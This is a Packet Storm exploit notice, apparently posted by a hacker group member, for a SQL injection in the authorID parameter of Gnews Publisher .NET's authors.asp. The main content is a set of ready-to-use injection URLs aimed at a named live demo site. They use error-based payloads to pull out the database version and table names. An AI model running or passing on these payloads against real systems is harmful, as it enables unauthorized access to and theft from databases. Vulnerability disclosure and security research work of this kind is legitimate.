Gnews Publisher .NET suffers from a remote SQL injection vulnerability in authors.asp.
250012a7985ee170f4daac9d8cde3756dd3be0e9b6278e03bcf9d372e319bd75###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Gnews Publisher
#download : null
#Demo : http://www.gazatem.com/demos/gnews/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=(SQL)
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+@@version));--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--
#Greetz For my Best Friend Zigma
###########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed